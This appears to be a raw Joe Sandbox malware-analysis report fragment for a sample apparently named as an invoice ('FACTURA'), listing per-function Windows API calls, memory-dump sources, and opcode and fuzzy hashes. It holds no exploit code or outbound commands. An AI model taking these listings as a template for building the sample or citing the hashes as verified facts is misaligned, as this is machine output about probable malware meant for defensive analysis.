                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: d87cf6012b386e00e1d905886fd00be46cb19ef2b289d46f423e03b1005b97ff
                                                                            • Instruction ID: f616b67dee696c5a330b16203c25d9c37e946f504cba9a261dbaaeb637f969e7
                                                                            • Opcode Fuzzy Hash: d87cf6012b386e00e1d905886fd00be46cb19ef2b289d46f423e03b1005b97ff
                                                                            • Instruction Fuzzy Hash: AE419D35A0420AFBCF159F68CC44AE9BB74FB15324F20435AF928A22A0C7359954EB91
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F263E7
                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00F26433
                                                                            • TranslateMessage.USER32(?), ref: 00F2645C
                                                                            • DispatchMessageW.USER32(?), ref: 00F26466
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F26475
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                            • String ID:
                                                                            • API String ID: 2108273632-0
                                                                            • Opcode ID: 16dd7a1db407f1a62cfea5f23651632d2275afa76a26e0228c16edaf46a3ad96
                                                                            • Instruction ID: a6851131f4271cb6b1f9739411e58f9ce3cdaf22c697ce0b7f9f9e50c1220728
                                                                            • Opcode Fuzzy Hash: 16dd7a1db407f1a62cfea5f23651632d2275afa76a26e0228c16edaf46a3ad96
                                                                            • Instruction Fuzzy Hash: 4831E831D0066AEFDB25DFB0EC44BB67BACAB01720F140166E561C71A1E7359889F761
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00F28A30
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00F28ADA
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F28AE2
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00F28AF0
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F28AF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 6a918bc73e14557ccc074670d20caa1b32be73f20cd811e052e9739b9d85cfb7
                                                                            • Instruction ID: 18a8c0d8665a8c89b47fde52c7cb3258646e99746e3032a67f070ea7aaca060b
                                                                            • Opcode Fuzzy Hash: 6a918bc73e14557ccc074670d20caa1b32be73f20cd811e052e9739b9d85cfb7
                                                                            • Instruction Fuzzy Hash: 4B31F171901229EBCB00CFA8E94CA9E3BB5EB05326F104229F925E71D0CBB49915EF90
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00F2B204
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F2B221
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F2B259
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F2B27F
                                                                            • _wcsstr.LIBCMT ref: 00F2B289
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5B192
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F5B1B7
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F5B1CF
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00F5B1F8
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F40E90,00000000), ref: 00F5B216
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29320
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29352
                                                                            • __itow.LIBCMT ref: 00F2936A
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29392
                                                                            • __itow.LIBCMT ref: 00F293A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: MessageSend$__itow$_memmove
                                                                            • String ID:
                                                                            • API String ID: 2983881199-0
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00F45A6E
                                                                            • GetForegroundWindow.USER32 ref: 00F45A85
                                                                            • GetDC.USER32(00000000), ref: 00F45AC1
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00F45ACD
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00F45B08
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED134D
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED135C
                                                                            • BeginPath.GDI32(?), ref: 00ED1373
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED139C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F34ABA
                                                                            • __beginthreadex.LIBCMT ref: 00F34AD8
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00F34AED
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F34B03
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F34B0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F2821E
                                                                            • GetLastError.KERNEL32(?,00F27CE2,?,?,?), ref: 00F28228
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00F27CE2,?,?,?), ref: 00F28237
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00F27CE2), ref: 00F2823E
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F28255
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 883493501-0
                                                                            APIs
                                                                            • CLSIDFromProgID.COMBASE ref: 00F27127
                                                                            • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F27142
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27044,80070057,?,?), ref: 00F27150
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F27160
                                                                            • CLSIDFromString.COMBASE(?,?), ref: 00F2716C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35260
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F3526E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35276
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F35280
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: 28c87e0b4f8259df83cc647d7ae139f10474a29d3342d199349e80ebd32b06f7
                                                                            • Instruction ID: c025e873d1226743e56895dc9e2dfb9889dd42339d3717ec7814037a0e6d1a9d
                                                                            • Opcode Fuzzy Hash: 28c87e0b4f8259df83cc647d7ae139f10474a29d3342d199349e80ebd32b06f7
                                                                            • Instruction Fuzzy Hash: 49012971D01A1DDBCF00EFE4EC49AEEBB78FB49B22F400596EA45B2191CB309554A7A1
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28121
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F2812B
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2813A
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F28141
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28157
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 47921759-0
                                                                            • Opcode ID: a68df41e5afafd05af5024f4985186ca5f915879a610f998b28d6fee8e78180c
                                                                            • Instruction ID: 22a2a5506358aac62217277715b37db35b2a540d7bd84f0d58e4c12d412fbf85
                                                                            • Opcode Fuzzy Hash: a68df41e5afafd05af5024f4985186ca5f915879a610f998b28d6fee8e78180c
                                                                            • Instruction Fuzzy Hash: 99F06271602328AFEB110FA5EC8DE6B3BACFF497A5B040065FA45C7190CB619D56EA60
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F2C1F7
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F2C20E
                                                                            • MessageBeep.USER32(00000000), ref: 00F2C226
                                                                            • KillTimer.USER32(?,0000040A), ref: 00F2C242
                                                                            • EndDialog.USER32(?,00000001), ref: 00F2C25C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 16c20c5bcd9057950e95b6fd206f53e52e04a13a6cabff10c790e3e6c62e8a63
                                                                            • Instruction ID: 9148bd8207d60d0e18c2a1ad56f5fc1b624a5f4f7a312f6b4cd82280bd23bb17
                                                                            • Opcode Fuzzy Hash: 16c20c5bcd9057950e95b6fd206f53e52e04a13a6cabff10c790e3e6c62e8a63
                                                                            • Instruction Fuzzy Hash: CB018B30904718D7EB206B64FD4EF9677B8FF00706F0006A9F682A14E1DBF46958AB91
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 00ED13BF
                                                                            • StrokeAndFillPath.GDI32(?,?,00F0B888,00000000,?), ref: 00ED13DB
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED13EE
                                                                            • DeleteObject.GDI32 ref: 00ED1401
                                                                            • StrokePath.GDI32(?), ref: 00ED141C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: e042b42f2934d98deab7c95db7ec78cc7cc013eaa8c240f073acd87a81b6a6d9
                                                                            • Instruction ID: 429c4c674904d8b2822f29dffadb70eecda662df95555790cb8809e6b5ea1da4
                                                                            • Opcode Fuzzy Hash: e042b42f2934d98deab7c95db7ec78cc7cc013eaa8c240f073acd87a81b6a6d9
                                                                            • Instruction Fuzzy Hash: 47F0E730405B0CEBDB125F26EC4C7583FA4EB0172AF0892A6E529991F1C731899AEF50
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F2899D
                                                                            • CloseHandle.KERNEL32(?), ref: 00F289B2
                                                                            • CloseHandle.KERNEL32(?), ref: 00F289BA
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F289C3
                                                                            • HeapFree.KERNEL32(00000000), ref: 00F289CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                                            • String ID:
                                                                            • API String ID: 3751786701-0
                                                                            • Opcode ID: c9e66b17401a949f9c73dcde777b6a8f759fae44859c40939d51645e491f4d35
                                                                            • Instruction ID: a1512b1a25ac41438a20eaffc439eb23b660bfa9f0839c212a3e91d06bd8e0de
                                                                            • Opcode Fuzzy Hash: c9e66b17401a949f9c73dcde777b6a8f759fae44859c40939d51645e491f4d35
                                                                            • Instruction Fuzzy Hash: BBE05276105609FBDA012FE5EC0C95ABB69FB89763B508671F31981470CB32A469EB50
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3C432
                                                                            • CoCreateInstance.COMBASE(00F62D6C,00000000,00000001,00F62BDC,?), ref: 00F3C44A
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • CoUninitialize.COMBASE ref: 00F3C6B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: 00caaa21a4d2ff098758bf6cd0af39f15157e300fdf2d15bd689eea2704c8f25
                                                                            • Instruction ID: a304b17215e65cc66e935acf2a52514d58b8876022353c4150569a07dd36b25c
                                                                            • Opcode Fuzzy Hash: 00caaa21a4d2ff098758bf6cd0af39f15157e300fdf2d15bd689eea2704c8f25
                                                                            • Instruction Fuzzy Hash: 0AA13A71104205AFD700EF54CC91EAFB7E8EF95354F00491DF595AB2A2EB71EA0ACB62
                                                                            APIs
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00ED7A51: _memmove.LIBCMT ref: 00ED7AAB
                                                                            • __swprintf.LIBCMT ref: 00EE2ECD
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EE2D66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: b9c0575960f7f36cf2964786b6c273b386453f7c9246d035c1ca152ecc7072e1
                                                                            • Instruction ID: 5e95371f3e4e559215e746b16c5714ddb8154f8b0b6027ad6ee7074a358f9e7f
                                                                            • Opcode Fuzzy Hash: b9c0575960f7f36cf2964786b6c273b386453f7c9246d035c1ca152ecc7072e1
                                                                            • Instruction Fuzzy Hash: 72918C725082559FC714EF24C895CAEB7E8EF85310F00691EF595EB2A2EB30ED45CB52
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                            • CoInitialize.OLE32(00000000), ref: 00F3B9BB
                                                                            • CoCreateInstance.COMBASE(00F62D6C,00000000,00000001,00F62BDC,?), ref: 00F3B9D4
                                                                            • CoUninitialize.COMBASE ref: 00F3B9F1
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 64a0e1c988e37fe2758012bb2f47b43876505ae2da038a079ee51c6929cf9964
                                                                            • Instruction ID: 8bef61089999538da7f82e42e4d9ac55957cb85a69b2129c9d3831c376926429
                                                                            • Opcode Fuzzy Hash: 64a0e1c988e37fe2758012bb2f47b43876505ae2da038a079ee51c6929cf9964
                                                                            • Instruction Fuzzy Hash: 2AA18A75A043059FCB04DF14C894D2ABBE5FF89324F048989F9999B3A2CB31EC46DB91
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00EF50AD
                                                                              • Part of subcall function 00F000F0: __87except.LIBCMT ref: 00F0012B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
